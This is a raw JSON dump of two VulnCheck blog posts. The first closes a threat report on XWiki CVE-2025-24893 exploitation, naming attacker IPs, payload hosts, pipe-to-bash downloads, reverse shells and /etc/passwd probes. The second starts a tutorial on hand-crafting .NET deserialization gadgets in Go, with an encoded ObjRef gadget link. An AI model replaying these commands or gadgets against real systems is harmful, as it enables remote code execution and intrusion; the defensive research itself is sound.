since.",[18,30081,30082,30083,30088,30089,30092,30093,30096,30097,4606],{},"These attacks are easily attributed to RondoDox based on its ",[47,30084,30087],{"href":30085,"rel":30086},"https:\u002F\u002Fitnext.io\u002Frondodox-v2-evolution-of-rondodox-botnet-with-650-more-exploits-b16427b17aea",[51],"well-known"," HTTP User-Agent and secondary payload naming convention (",[886,30090,30091],{},"rondo.\u003Cvalue>.sh","). The associated payload servers are also well documented. For example, ",[886,30094,30095],{},"74.194.191.52"," can be seen below in a RondoDox exploitation of ",[47,30098,30050],{"href":30048,"rel":30099},[51],[68,30101],{"src":30102,"alt":21258,"className":30103},"\u002Fblog\u002Fxwiki-under-increased-attack\u002F1-light.png",[10876,21260],[68,30105],{"src":30106,"alt":21258,"className":30107},"\u002Fblog\u002Fxwiki-under-increased-attack\u002F1-dark.png",[21265,21266],[18,30109,30110,30111,30114,30115,30118],{},"RondoDox isn’t the only actor exploiting this bug. Beginning on November 7, 2025, we observed ",[886,30112,30113],{},"172.245.241.123"," download a payload from ",[886,30116,30117],{},"ospwrf10ny.anondns[.]net"," and pipe it to bash. The payload is obfuscated. The attacker base64 encodes it, but it remains visible in the URL, as is typical with this vulnerability. Below is an example of that November 7 exploitation:",[68,30120],{"src":30121,"alt":21292,"className":30122},"\u002Fblog\u002Fxwiki-under-increased-attack\u002F2-light.png",[10876,21260],[68,30124],{"src":30125,"alt":21292,"className":30126},"\u002Fblog\u002Fxwiki-under-increased-attack\u002F2-dark.png",[21265,21266],[18,30128,30129,30130,27987],{},"The obfuscated payload downloads a secondary payload which in turn fetches and executes a coin miner (file hash: ",[47,30131,30134],{"href":30132,"rel":30133},"https:\u002F\u002Fwww.virustotal.com\u002Fgui\u002Ffile\u002F03a77a556f074184b254d90e13cdd3a31efaa5a77640405e5f78aa462736acf7",[51],"03a77a556f074184b254d90e13cdd3a31efaa5a77640405e5f78aa462736acf7",[18,30136,30137,30138,30141,30142,30145,30146,59],{},"There is no lack of coin miner activity. On November 7, 2025, ",[886,30139,30140],{},"156.146.56.131"," fetched a secondary payload from ",[886,30143,30144],{},"47.236.194.231:81"," (the host is now offline). The secondary payload was executed in a second-pass exploit, as discussed in ",[1131,30147,30148],{},[47,30149,19428],{"href":19426,"rel":30150},[51],[68,30152],{"src":30153,"alt":21314,"className":30154},"\u002Fblog\u002Fxwiki-under-increased-attack\u002F3-light.png",[10876,21260],[68,30156],{"src":30157,"alt":21314,"className":30158},"\u002Fblog\u002Fxwiki-under-increased-attack\u002F3-dark.png",[21265,21266],[18,30160,30161,30162,30167,30168,982,30171,30174,30175,59],{},"The attacker from ",[1131,30163,30164],{},[47,30165,19428],{"href":19426,"rel":30166},[51],", appears to have expanded their efforts. In addition to the two IP addresses documented previously, they’ve added new payload hosting servers at ",[886,30169,30170],{},"185.142.33.151",[886,30172,30173],{},"90.156.218.31",". They’re also now launching exploits from ",[886,30176,30177],{},"172.206.196.45",[68,30179],{"src":30180,"alt":21330,"className":30181},"\u002Fblog\u002Fxwiki-under-increased-attack\u002F4-light.png",[10876,21260],[68,30183],{"src":30184,"alt":21330,"className":30185},"\u002Fblog\u002Fxwiki-under-increased-attack\u002F4-dark.png",[21265,21266],[61,30187,30189],{"id":30188},"reverse-shells","Reverse Shells",[18,30191,30192],{},"We’ve also observed several reverse shell attempts. These may indicate \"hands-on-keyboard\" activity, or they could represent a different form of automation intended to avoid HTTP-based communication.",[18,30194,30195,30196,30199,30200,30203,30204,30208],{},"On October 31, 2025, ",[886,30197,30198],{},"18.228.3.224"," attempted to establish a reverse shell back to itself using the BusyBox ",[886,30201,30202],{},"nc"," binary. Unlike many of the addresses we’ve talked about so far, ",[47,30205,30198],{"href":30206,"rel":30207},"https:\u002F\u002Fwww.abuseipdb.com\u002Fcheck\u002F18.228.3.224",[51]," is notable in that it's an AWS-associated IP address with no clear history of abuse. We’ll revisit this address’s scanning behavior in the next section, but it likely represents a more targeted attack.",[68,30210],{"src":30211,"alt":21345,"className":30212},"\u002Fblog\u002Fxwiki-under-increased-attack\u002F5-light.png",[10876,21260],[68,30214],{"src":30215,"alt":21345,"className":30216},"\u002Fblog\u002Fxwiki-under-increased-attack\u002F5-dark.png",[21265,21266],[18,30218,30219,30220,30223,30224,30227,30228,30232,30233,30237,30238,30243,30244,59],{},"Among the other reverse shell attempts we saw, on November 11, 2025 ",[886,30221,30222],{},"118.99.141.178"," attempted to establish a bash reverse shell to ",[886,30225,30226],{},"155.138.212.170:9001",". The source host, ",[47,30229,30222],{"href":30230,"rel":30231},"https:\u002F\u002Fen.fofa.info\u002Fcaptcha?redirect=%2Fresult%3Fqbase64%3DMTE4Ljk5LjE0MS4xNzg%253D",[51],", is notable because it exposes both QNAP and DrayTek interfaces to the internet, suggesting that this could be an exploited host. This assessment is supported by our ",[47,30234,30236],{"href":1249,"rel":30235},[51],"IP Intel"," product, which had been ",[47,30239,30242],{"href":30240,"rel":30241},"https:\u002F\u002Fapi.vulncheck.com\u002Fv3\u002Findex\u002Fipintel-10d?cidr=118.99.141.178\u002F32",[51],"tracking"," the address as potentially vulnerable to QNAP’s ",[47,30245,30248],{"href":30246,"rel":30247},"https:\u002F\u002Fconsole.vulncheck.com\u002Fcve\u002FCVE-2023-47218",[51],"CVE-2023-47218",[68,30250],{"src":30251,"alt":21422,"className":30252},"\u002Fblog\u002Fxwiki-under-increased-attack\u002F6-light.png",[10876,21260],[68,30254],{"src":30255,"alt":21422,"className":30256},"\u002Fblog\u002Fxwiki-under-increased-attack\u002F6-dark.png",[21265,21266],[61,30258,30260],{"id":30259},"scanners-and-probing","Scanners and Probing",[18,30262,30263,30264,30267],{},"Beyond reverse shells, plenty of actors are simply looking for targets, which is why we’ve seen a variety of scanners and probes from attackers. The most interesting one is an out-of-band application security testing (OAST)-based scanner using ",[886,30265,30266],{},"oast.fun",", often associated with Nuclei and similar tools. This sort of traffic usually makes analysts’ eyes glaze over due to the sheer volume of internet-wide probing.",[18,30269,30270,30271,30273,30274,30277,30278,30280],{},"However, one ",[886,30272,30266],{}," payload we captured stood out for two reasons. First, as we will see, the Nuclei template for ",[47,30275,30050],{"href":30048,"rel":30276},[51]," doesn’t use an OAST-based check, suggesting the payload came from a less common tool. Second, the attacker, ",[886,30279,30198],{},", also attempted a reverse shell (see the previous section), indicating this activity may be more deliberate than routine scanning.",[68,30282],{"src":30283,"alt":21507,"className":30284},"\u002Fblog\u002Fxwiki-under-increased-attack\u002F7-light.png",[10876,21260],[68,30286],{"src":30287,"alt":21507,"className":30288},"\u002Fblog\u002Fxwiki-under-increased-attack\u002F7-dark.png",[21265,21266],[18,30290,30291,30292,30297,30298,30301,30302,30305],{},"Of course, we’ve seen an increase in Nuclei scans as well. The Nuclei ",[47,30293,30296],{"href":30294,"rel":30295},"https:\u002F\u002Fgithub.com\u002Fprojectdiscovery\u002Fnuclei-templates\u002Fblob\u002Fmain\u002Fhttp\u002Fcves\u002F2025\u002FCVE-2025-24893.yaml",[51],"template"," for ",[47,30299,30050],{"href":30048,"rel":30300},[51]," outputs the results of ",[886,30303,30304],{},"cat \u002Fetc\u002Fpasswd",". We see quite a bit of this from many sources:",[68,30307],{"src":30308,"alt":21661,"className":30309},"\u002Fblog\u002Fxwiki-under-increased-attack\u002F8-light.png",[10876,21260],[68,30311],{"src":30312,"alt":21661,"className":30313},"\u002Fblog\u002Fxwiki-under-increased-attack\u002F8-dark.png",[21265,21266],[18,30315,30316,30317,1246,30319,30321],{},"We also observed probes using ",[886,30318,26412],{},[886,30320,22876],{},", and just generic printing of “EXPLOIT_SUCCESS.” All are viable approaches, but a bit off the beaten Nuclei path.",[68,30323],{"src":30324,"alt":22955,"className":30325},"\u002Fblog\u002Fxwiki-under-increased-attack\u002F9-light.png",[10876,21260],[68,30327],{"src":30328,"alt":22955,"className":30329},"\u002Fblog\u002Fxwiki-under-increased-attack\u002F9-dark.png",[21265,21266],[61,30331,1903],{"id":1902},[18,30333,30334,30337,30338,30341],{},[47,30335,30050],{"href":30048,"rel":30336},[51]," is a familiar story: one attacker moves first, and many follow. Within days of the initial exploitation, we saw botnets, miners, and opportunistic scanners all adopting the same vulnerability. Once again, this highlights the gap between exploitation in the wild and visibility at scale. By the time an issue lands in CISA KEV, attackers are already days ahead, and early detection remains the only real advantage defenders have. VulnCheck’s ",[47,30339,283],{"href":281,"rel":30340},[51]," caught these attacks before they reached broader awareness, giving defenders a chance to respond before exploitation became widespread.",[61,30343,202],{"id":201},[18,30345,29952,30346,1246,30349,1255,30354,59],{},[47,30347,19428],{"href":19426,"rel":30348},[51],[47,30350,30353],{"href":30351,"rel":30352},"https:\u002F\u002Fwww.vulncheck.com\u002Fblog\u002Foctober-2025-research-highlights",[51],"VulnCheck Research Highlights: October 2025",[47,30355,30358],{"href":30356,"rel":30357},"https:\u002F\u002Fwww.vulncheck.com\u002Fblog\u002Fnew-citrix-netscaler-zero-day-vulnerability-exploited-in-the-wild",[51],"New Citrix NetScaler Zero-Day Vulnerability Exploited in the Wild",[18,30360,1228,30361,1234,30364,1240,30367,1246,30370,1255,30373,1260],{},[47,30362,1233],{"href":10806,"rel":30363},[51],[47,30365,1239],{"href":1237,"rel":30366},[51],[47,30368,1245],{"href":1243,"rel":30369},[51],[47,30371,1251],{"href":1249,"rel":30372},[51],[47,30374,216],{"href":1258,"rel":30375},[51],{"title":219,"searchDepth":220,"depth":220,"links":30377},[30378,30379,30380,30381,30382],{"id":30075,"depth":220,"text":30076},{"id":30188,"depth":220,"text":30189},{"id":30259,"depth":220,"text":30260},{"id":1902,"depth":220,"text":1903},{"id":201,"depth":220,"text":202},"What began as one attacker exploiting CVE-2025-24893 has become a multi-actor scramble including botnets, miners, and custom tooling. Our early Canary detections show how quickly real-world exploitation now evolves.",{"slug":30385},"xwiki-under-increased-attack","\u002Fblog\u002Fxwiki-under-increased-attack",{"title":10801,"description":30383},"blog\u002Fxwiki-under-increased-attack",[2941,242,1281,1279],"1PnTmsKFw9Qx8PCKgygkGuq7B3vGU_CT9aZXPrBRFVs",{"id":30392,"title":30393,"articles":7,"authors":30394,"body":30396,"date":31224,"description":31225,"extension":234,"image":7,"link":7,"meta":31226,"navigation":237,"path":31228,"seo":31229,"series":7,"stem":31230,"subtype":7,"tags":31231,"__hash__":31232},"blog\u002Fblog\u002Fmaking-dotnet-gadgets.md","Making Serialization Gadgets by Hand - .NET",[30395],{"name":13183,"avatar":13184,"link":13185,"linkName":13186},{"type":15,"value":30397,"toc":31206},[30398,30402,30423,30425,30436,30440,30447,30450,30457,30460,30464,30467,30482,30486,30495,30503,30506,30512,30520,30524,30527,30548,30554,30558,30561,30564,30571,30591,30608,30614,30618,30625,30628,30634,30644,30650,30653,30657,30660,30666,30670,30677,30683,30691,30695,30703,30706,30712,30724,30743,30746,30753,30759,30763,30766,30772,30776,30788,30791,30797,30807,30811,30816,30820,30826,30829,30832,30839,30843,30851,30854,30860,30863,30871,30884,30887,30891,30894,30897,30915,30922,30929,30947,30951,30954,30961,30976,30979,30985,30999,31003,31006,31012,31015,31021,31070,31077,31089,31092,31098,31101,31122,31135,31139,31146,31150,31157,31161,31164,31170,31174,31182,31184,31186,31203],[61,30399,30401],{"id":30400},"go-exploits-new-net-deserialization-library","Go-Exploit's New .NET Deserialization Library",[18,30403,30404,30405,30408,30409,30413,30414,30418,30419,59],{},"Recently our ",[47,30406,1245],{"href":1243,"rel":30407},[51]," team added a .NET deserialization payload generation library to ",[47,30410,20558],{"href":30411,"rel":30412},"https:\u002F\u002Fgithub.com\u002Fvulncheck-oss\u002Fgo-exploit\u002F",[51],", VulnCheck's open-source exploit framework. This article discusses how that library came to be while providing enough information into that process to allow others to create their own gadget chains by hand if they so please. At ",[47,30415,30417],{"href":30416},"#usage","the end",", we discuss how to use the new go-exploit library to generate deserialization payloads (without the need for Windows), or for integration in your own Golang-based exploits, regardless of whether or not they use go-exploit. Our library is designed to be used \"out of the box\" by any Go program without needing to define or set up any special objects. You can learn more about the advantages of go-exploit ",[47,30420,305],{"href":30421,"rel":30422},"https:\u002F\u002Fwww.vulncheck.com\u002Fblog\u002Fgo-exploit",[51],[61,30424,13194],{"id":13191},[22,30426,30427,30430,30433],{},[25,30428,30429],{},"Challenges of adding deserialization payloads into exploits",[25,30431,30432],{},"How to create your own deserialization library, including a technical breakdown of .NET serialization streams",[25,30434,30435],{},"How to use VulnCheck's own .NET deserialization library for golang-based exploits",[61,30437,30439],{"id":30438},"challenges-of-deserialization-gadgets-in-payloads","Challenges of Deserialization Gadgets in Payloads",[18,30441,30442,30443,30446],{},"When you are writing .NET deserialization exploits in a language other than C# and you want dynamic parameters in your payload, your options are generally limited to \"shelling out\" to ysoserial.net or pasting in a binary array that was ",[1131,30444,30445],{},"created"," by ysoserial.net and then editing it at runtime.",[18,30448,30449],{},"Neither of these options is great. The first option demands that you use a specific program on a specific operating system (Windows) to create the gadgets. The second option is prone to mistakes due to the length encoding of strings and certain records being incorrectly implemented; it also makes the payload less modifiable\u002Fclean.",[18,30451,30452,30453,30456],{},"We instead opt for a third option: to create the .NET gadgets \"by hand\" for our golang-based exploit framework, ",[47,30454,20558],{"href":30411,"rel":30455},[51],".\nIn doing so, we learned a great deal about the .NET serialization stream structure and will present it in this article to help those wishing to do something similar in their own framework or anyone just wanting to learn more about serialization streams.",[18,30458,30459],{},"Though this article is written in the context of golang, the same ideas should be transferable to any other language.",[61,30461,30463],{"id":30462},"what-are-net-gadgets-made-of","What Are .NET Gadgets Made Of?",[18,30465,30466],{},"I am going to show how .NET deserialization objects are broken down by looking at what their sub-components are and how they are constructed during serialization. After that I will show you how to create your own serialization library that would allow you to recreate these gadgets in any language. Finally, I will show how to use gadgets directly from the new go-exploit library.",[18,30468,30469,30470,30475,30476,30481],{},".NET deserialization payloads are effectively a stream of \"",[47,30471,30474],{"href":30472,"rel":30473},"https:\u002F\u002Flearn.microsoft.com\u002Fen-us\u002Fopenspecs\u002Fwindows_protocols\u002Fms-nrbf\u002F954a0657-b901-4813-9398-4ec732fe8b32",[51],"Records","\" which can be thought of as ",[47,30477,30480],{"href":30478,"rel":30479},"https:\u002F\u002Fen.wikipedia.org\u002Fwiki\u002FStruct_(C_programming_language)",[51],"structs",". Given that records are effectively structs, it makes sense that to create gadgets, we should make structs and then place them in a byte array such that we produce a sane gadget at the end.",[993,30483,30485],{"id":30484},"the-first-record-serializationheaderrecord","The First Record: SerializationHeaderRecord",[18,30487,30488,30489,30494],{},"Throughout this tutorial we will be using an ObjRef gadget, viewable using ",[47,30490,30493],{"href":30491,"rel":30492},"https:\u002F\u002Fgchq.github.io\u002FCyberChef\u002F#recipe=From_Hex('Auto')To_Hexdump(16,false,false,false)&input=MDAwMTAwMDAwMGZmZmZmZmZmMDEwMDAwMDAwMDAwMDAwMDA0MDEwMDAwMDAxMDUzNzk3Mzc0NjU2ZDJlNDU3ODYzNjU3MDc0Njk2ZjZlMDEwMDAwMDAwOTQzNmM2MTczNzM0ZTYxNmQ2NTAzMWU1Mzc5NzM3NDY1NmQyZTUyNzU2ZTc0Njk2ZDY1MmU1MjY1NmQ2Zjc0Njk2ZTY3MmU0ZjYyNmE1MjY1NjYwOTAyMDAwMDAwMDQwMjAwMDAwMDFlNTM3OTczNzQ2NTZkMmU1Mjc1NmU3NDY5NmQ2NTJlNTI2NTZkNmY3NDY5NmU2NzJlNGY2MjZhNTI2NTY2MDEwMDAwMDAwMzc1NzI2YzAxMDYwMzAwMDAwMDIwNjg3NDc0NzAzYTJmMmYzMTM5MzIyZTMxMzYzODJlMzUzMTJlMzEzNTNhMzgzODM4MzgyZjY4NjM1MTYxNDE1NDBi",[51],"this cyberchef link",". I chose this gadget because it is small and simple; other gadgets are generally much larger.",[18,30496,30497,30498,59],{},"The very first record we will look at in the stream is a static record that begins every serialized .NET stream, the ",[47,30499,30502],{"href":30500,"rel":30501},"https:\u002F\u002Flearn.microsoft.com\u002Fen-us\u002Fopenspecs\u002Fwindows_protocols\u002Fms-nrbf\u002Fa7e578d3-400a-4249-9424-7529d10d1b3c",[51],"SerializationHeaderRecord",[18,30504,30505],{},"Here is the hex dump for the SerializationHeaderRecord:",[1354,30507,30510],{"className":30508,"code":30509,"language":1359},[1357],"00000000 00 01 00 00 00 ff ff ff ff 01 00 00 00 00 00 00 |.....ÿÿÿÿ.......|\n00000010 00 |.|\n",[886,30511,30509],{"__ignoreMap":219},[18,30513,30514,30515,30519],{},"According to the ",[47,30516,30518],{"href":30500,"rel":30517},[51],"documentation"," above: \"The SerializationHeaderRecord record MUST be the first record in a binary serialization. This record has the major and minor version of the format and the IDs of the top object and the headers.\"",[14603,30521,30523],{"id":30522},"quick-tip-reading-the-microsoft-documentation","Quick Tip: Reading the Microsoft Documentation",[18,30525,30526],{},"Almost every link in this article will be to Microsoft documentation and while I am certain that you know how to read given that you've made it this far, I have dropped a few tips below to ease interpretation of these pages for those who are unfamiliar with the format.",[22,30528,30529,30532,30539,30542,30545],{},[25,30530,30531],{},"There is a table representing the layout of the record; I find this table more confusing than helpful so you may want to consider ignoring it (see image below for clarification).",[25,30533,30534,30535,30538],{},"The information ",[1131,30536,30537],{},"beneath"," the table that breaks down each member of the struct is typically much more useful and easier to read.",[25,30540,30541],{},"The member information in the documentation is in the same order that the members appear within the records.",[25,30543,30544],{},"You can assume all INT32 values are little-endian.",[25,30546,30547],{},"It is important to read all member descriptions.",[18,30549,30550],{},[68,30551],{":width":10862,"alt":30552,"src":30553},"msdn","\u002Fblog\u002Fmaking-dotnet-gadgets\u002Fmsdn.png",[14603,30555,30557],{"id":30556},"recordtypeenum-1-byte","RecordTypeEnum (1 byte)",[18,30559,30560],{},"Now that we know how to decipher the Microsoft docs, let's get on to the first member in the record, RecordTypeEnum.",[18,30562,30563],{},"The description for this member reads: \"RecordTypeEnum (1 byte): A RecordTypeEnumeration value that identifies the record type. The value MUST be 0.\"",[18,30565,30566,30567,30570],{},"When reversing serialized streams on your own for reconstruction, this byte is the first byte you will see for a given record and it tells you what record is coming next. In this case, we saw a ",[886,30568,30569],{},"00",", so we know a SerializationHeaderRecord is coming.",[18,30572,30573,30574,30577,30578,30582,30583,30587,30588,30590],{},"Every record type has its own ",[886,30575,30576],{},"RecordTypeEnum"," that is 1 byte, and each record has a different number that is sequential based on their order in the ",[47,30579,30581],{"href":30472,"rel":30580},[51],"RecordTypeEnumeration",". That ",[47,30584,30586],{"href":30472,"rel":30585},[51],"link"," contains a list of all the record types, of which only a subset have been useful for payloads, having written about a dozen or so gadgets by hand. With that said, I would ",[1131,30589,6881],{}," suggest going ahead and implementing every gadget, but rather build them as needed.",[18,30592,30593,30594,30596,30597,30602,30603,30607],{},"So for a SerializationHeaderRecord, this value will ALWAYS be ",[886,30595,30569],{}," in hexidecimal, so we should represent this as a constant somewhere in our code. In the Microsoft docs you see that RecordTypeEnumeration is exactly that, an enum, so we should just make an enum for record types in our code. I am using Golang, which does not have have enums natively, and while there are ",[47,30598,30601],{"href":30599,"rel":30600},"https:\u002F\u002Fgobyexample.com\u002Fenums",[51],"methods for creating them in go",", I will just use a string map because that will serve my purposes just fine here. Using the ",[47,30604,30606],{"href":30472,"rel":30605},[51],"Microsoft docs"," as reference, it looks something like this:",[1354,30609,30612],{"className":30610,"code":30611,"language":1359},[1357],"var RecordTypeEnumMap = map[string]int{\n \"SerializedStreamHeader\": 0,\n \"ClassWithId\": 1,\n \"SystemClassWithMembers\": 2,\n \"ClassWithMembers\": 3,\n \"SystemClassWithMembersAndTypes\": 4,\n \"ClassWithMembersAndTypes\": 5,\n \"BinaryObjectString\": 6,\n \"BinaryArray\": 7,\n \"MemberPrimitiveTyped\": 8,\n \"MemberReference\": 9,\n \"ObjectNull\": 10,\n \"MessageEnd\": 11,\n \"BinaryLibrary\": 12,\n \"ObjectNullMultiple256\": 13,\n \"ObjectNullMultiple\": 14,\n \"ArraySinglePrimitive\": 15,\n \"ArraySingleObject\": 16,\n \"ArraySingleString\": 17,\n \"MethodCall\": 21,\n \"MethodReturn\": 22,\n}\n",[886,30613,30611],{"__ignoreMap":219},[14603,30615,30617],{"id":30616},"rootid-4-bytes","RootId (4 bytes)",[18,30619,30620,30621,30624],{},"The next member is RootId (4 bytes), which is described as \"An INT32 value (as specified in ",[1373,30622,30623],{},"MS-DTYP"," section 2.2.22) that identifies the root of the graph of nodes.\"",[18,30626,30627],{},"This is a variable value, so let's add it to the struct as an int. Remember that we did not add RecordTypeEnum because this is a constant\u002Fstatic value.",[1354,30629,30632],{"className":30630,"code":30631,"language":1359},[1357],"\u002F\u002F The start of our SerializationHeaderRecord struct\ntype SerializationHeaderRecord struct {\n RootID int\n}\n",[886,30633,30631],{"__ignoreMap":219},[18,30635,30636,30637,30639,30640,30643],{},"Remembering that all INT32 values are little-endian, and knowing that this is a ",[886,30638,467],{}," from the hex dump, we know we need to have this member output ",[886,30641,30642],{},"\\x01\\x00\\x00\\x00",". That said, we can start making some methods for our struct to produce the binary output for this record:",[1354,30645,30648],{"className":30646,"code":30647,"language":1359},[1357],"\u002F\u002F NOTE: SerializationHeaderRecord struct is still incomplete\nvar RecordTypeEnumMap = map[string]int{\n \"SerializedStreamHeader\": 0,\n ... \u002F\u002F omitted for brevity\n}\ntype SerializationHeaderRecord struct {\n RootID int\n}\nfunc (serializationHeaderRecord SerializationHeaderRecord) RecordToBin() (string, bool) {\n recordTypeEnumString := string(byte(RecordTypeEnumMap[\"SerializedStreamHeader\"]))\n rootIDString := transform.PackLittleInt32(serializationHeaderRecord.RootID)\n return recordTypeEnumString + rootIDString, true\n}\nshr := SerializationHeaderRecord{ RootID: 1 }\nshr.RecordToBin() \u002F\u002F should yield \"\\x00\\x01\\x00\\x00\\x00\" at this time\n",[886,30649,30647],{"__ignoreMap":219},[18,30651,30652],{},"This is the basic idea and structure of how to create these records and ultimately turn them into binary streams. Enough records converted into binary streams in the right order, you have a finished serialization stream!",[14603,30654,30656],{"id":30655},"headerid-4-bytes","HeaderId (4 bytes)",[18,30658,30659],{},"Continuing on, the next member is the HeaderId, which much like the previous member, is described as a variable INT32 value. We will add this to the struct as an int:",[1354,30661,30664],{"className":30662,"code":30663,"language":1359},[1357],"type SerializationHeaderRecord struct {\n RootID int\n HeaderID int\n}\n",[886,30665,30663],{"__ignoreMap":219},[14603,30667,30669],{"id":30668},"majorversion-4-bytes-and-minorversion-4-bytes","MajorVersion (4 bytes) and MinorVersion (4 bytes)",[18,30671,30672,30673,30676],{},"The MajorVersion and MinorVersion are a little different from the last two members as they MUST be 1 and 0 respectively.\nWe do not need to add them to the struct, but instead just update the ",[886,30674,30675],{},"ToRecordBin"," method for this struct to finish off our implementation of this record.",[1354,30678,30681],{"className":30679,"code":30680,"language":1359},[1357],"type Record interface {\n ToRecordBin() (string, bool)\n}\n\nvar RecordTypeEnumMap = map[string]int{\n \"SerializedStreamHeader\": 0,\n ... \u002F\u002F omitted for brevity\n}\n\ntype SerializationHeaderRecord struct {\n RootID int\n HeaderID int\n}\n\nfunc (serializationHeaderRecord SerializationHeaderRecord) RecordToBin() (string, bool) {\n recordTypeEnumString := string(byte(RecordTypeEnumMap[\"SerializedStreamHeader\"])) \u002F\u002F 0\n rootIDString := transform.PackLittleInt32(serializationHeaderRecord.RootID)\n headerIDString := transform.PackLittleInt32(serializationHeaderRecord.HeaderID)\n majorVersion := transform.PackLittleInt32(1) \u002F\u002F MUST be 1\n minorVersion := transform.PackLittleInt32(0) \u002F\u002F MUST be 0\n return recordTypeEnumString + rootIDString + headerIDString + majorVersion + minorVersion, true\n}\n\nshr := SerializationHeaderRecord{ RootID: 1 , HeaderID: -1 }\n\nshr.RecordToBin() \u002F\u002F should yield \"\\x00\\x01\\x00\\x00\\x00\\xff\\xff\\xff\\xff\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n\n\u002F\u002F add it to the full gadget being built\nvar gadgetRecords []Record\ngadgetRecords = append(gadgetRecords, shr) \u002F\u002F adding serialization header record to the gadget\n",[886,30682,30680],{"__ignoreMap":219},[18,30684,30685,30686,59],{},"Note: The code snippet above and all others in this article are for informational purposes and are not guaranteed to be completed\u002Fvalid code. Remember, if you need a fully working library to reference or use as is, see ",[47,30687,30690],{"href":30688,"rel":30689},"https:\u002F\u002Fgithub.com\u002Fvulncheck-oss\u002Fgo-exploit\u002Ftree\u002Fmain\u002Fdotnet",[51],"go-exploit's dotnet deserialization package",[993,30692,30694],{"id":30693},"systemclasswithmembersandtypes-record","SystemClassWithMembersAndTypes Record",[18,30696,30697,30698,59],{},"Now things get a bit more interesting with the very next record in the stream, ",[47,30699,30702],{"href":30700,"rel":30701},"https:\u002F\u002Flearn.microsoft.com\u002Fen-us\u002Fopenspecs\u002Fwindows_protocols\u002Fms-nrbf\u002Fecb47445-831f-4ef5-9c9b-afd4d06e3657",[51],"SystemClassWithMembersAndTypes",[18,30704,30705],{},"Here is the hex dump for SystemClassWithMembersAndTypes:",[1354,30707,30710],{"className":30708,"code":30709,"language":1359},[1357],"00000010 __ 04 01 00 00 00 10 53 79 73 74 65 6d 2e 45 78 |......System.Ex|\n00000020 63 65 70 74 69 6f 6e 01 00 00 00 09 43 6c 61 73 |ception.....Clas|\n00000030 73 4e 61 6d 65 03 1e 53 79 73 74 65 6d 2e 52 75 |sName..System.Ru|\n00000040 6e 74 69 6d 65 2e 52 65 6d 6f 74 69 6e 67 2e 4f |ntime.Remoting.O|\n00000050 62 6a 52 65 66 09 02 00 00 00 |bjRef..... |\n",[886,30711,30709],{"__ignoreMap":219},[18,30713,2245,30714,30717,30718,30723],{},[47,30715,30702],{"href":30700,"rel":30716},[51]," record starts at offset 0x11. This is sort of the \"main\" record that you will see in .NET gadgets, or its alternative, ",[47,30719,30722],{"href":30720,"rel":30721},"https:\u002F\u002Flearn.microsoft.com\u002Fen-us\u002Fopenspecs\u002Fwindows_protocols\u002Fms-nrbf\u002F847b0b6a-86af-4203-8ed0-f84345f845b9",[51],"ClassWithMembersAndTypes",". By main record I mean, this is the record that actually defines the object\u002Fclass that is intended to be deserialized which is sort of the \"point\" of a serialization stream. The difference between the two types above (SystemClassWithMembersAndTypes and ClassWithMembersAndTypes) is that the SystemClassWithMembersAndTypes is missing a LibraryID, as it is implicitly understood to be a system class and does not need it explicitly defined. Otherwise, these two records are the same.",[18,30725,30726,30727,7873,30732,30737,30738,30742],{},"These class records are quite verbose as they are primarily composed of two other (non-record) data structures: a ",[47,30728,30731],{"href":30729,"rel":30730},"https:\u002F\u002Flearn.microsoft.com\u002Fen-us\u002Fopenspecs\u002Fwindows_protocols\u002Fms-nrbf\u002F0a192be0-58a1-41d0-8a54-9c91db0ab7bf",[51],"ClassInfo",[47,30733,30736],{"href":30734,"rel":30735},"https:\u002F\u002Flearn.microsoft.com\u002Fen-us\u002Fopenspecs\u002Fwindows_protocols\u002Fms-nrbf\u002Faa509b5a-620a-4592-a5d8-7e9613e0a03e",[51],"MemberTypeInfo",". Viewing ",[47,30739,30741],{"href":30700,"rel":30740},[51],"the documentation",", we again see a RecordTypeEnum indicating that this is a SystemClassWithMembersAndTypes record which in this case, must be a 4. If you look, this is already present in our RecordTypeEnumMap above.",[14603,30744,30731],{"id":30745},"classinfo",[18,30747,30748,30749,30752],{},"Moving onto the ",[47,30750,30731],{"href":30729,"rel":30751},[51]," member, we can model it as a struct like so:",[1354,30754,30757],{"className":30755,"code":30756,"language":1359},[1357],"type ClassInfo struct {\n ObjectID int \u002F\u002F A value represented as an INT32\n Name string \u002F\u002F Length prefixed string\n MemberCount int \u002F\u002F should be equal to len(MemberNames) \u002F\u002F this could also just be created dynamically during to ToRecordBin() method\n MemberNames []string \u002F\u002F MemberNames\n}\n",[886,30758,30756],{"__ignoreMap":219},[14603,30760,30762],{"id":30761},"objectid","ObjectID",[18,30764,30765],{},"The first member of this struct is an Object ID. These are not specific to ClassInfo structures but are actually a part of many other records and structures that compose .NET serialization streams. These are basically used as unique identifiers or even \"addresses\" to reference objects throughout a serialization stream. These generally increment by 1 with each new object added to a stream.",[18,30767,30768,30769,27987],{},"The value for this one, as show in the dump output above, should be a 1. Represented as a little-endian INT32 (",[886,30770,30771],{},"\"\\x01\\x00\\x00\\x00\"",[14603,30773,30775],{"id":30774},"name","Name",[18,30777,30778,30779,30784,30785,30787],{},"Next is the Name. This is the name of the actual class, though it is not a normal string but is instead a ",[47,30780,30783],{"href":30781,"rel":30782},"https:\u002F\u002Flearn.microsoft.com\u002Fen-us\u002Fopenspecs\u002Fwindows_protocols\u002Fms-nrbf\u002F10b218f5-9b2b-4947-b4b7-07725a2c8127",[51],"LengthPrefixedString",". Do not assume this is \"just an int of the length\" — it is encoded in a specific way as defined in the documentation. Though for shorter length strings this ",[1131,30786,4563],{}," usually come out to simply be something like hex(len(string)).",[18,30789,30790],{},"To make things easier, I will leave the appropriate function for encoding this length below, from our go-exploit dotnet package.",[1354,30792,30795],{"className":30793,"code":30794,"language":1359},[1357],"func Write7BitEncodedInt(value int) []byte {\n var (\n bs []byte\n v = uint(value)\n )\n for v >= 0x80 {\n bs = append(bs, byte(v|0x80))\n v >>= 7\n }\n bs = append(bs, byte(v))\n return bs\n}\n",[886,30796,30794],{"__ignoreMap":219},[18,30798,30799,30800,30803,30804,59],{},"The Name for this one is \"System.Exception\", which makes sense, given that this is a system class and we are dealing with a SystemClassWithMembersAndTypes. But do not forget to prefix it with the encoded length (16, which in this case comes out to ",[886,30801,30802],{},"\\x10","), making it: ",[886,30805,30806],{},"\"\\x10System.Exception\"",[14603,30808,30810],{"id":30809},"membercount","MemberCount",[18,30812,30813,30814,59],{},"Next is MemberCount, another INT32 value. As the name suggests, this is the number of members that are defined in the next item in the struct, the MemberNames. As the dump shows, this is a 1, which we know will be represented as 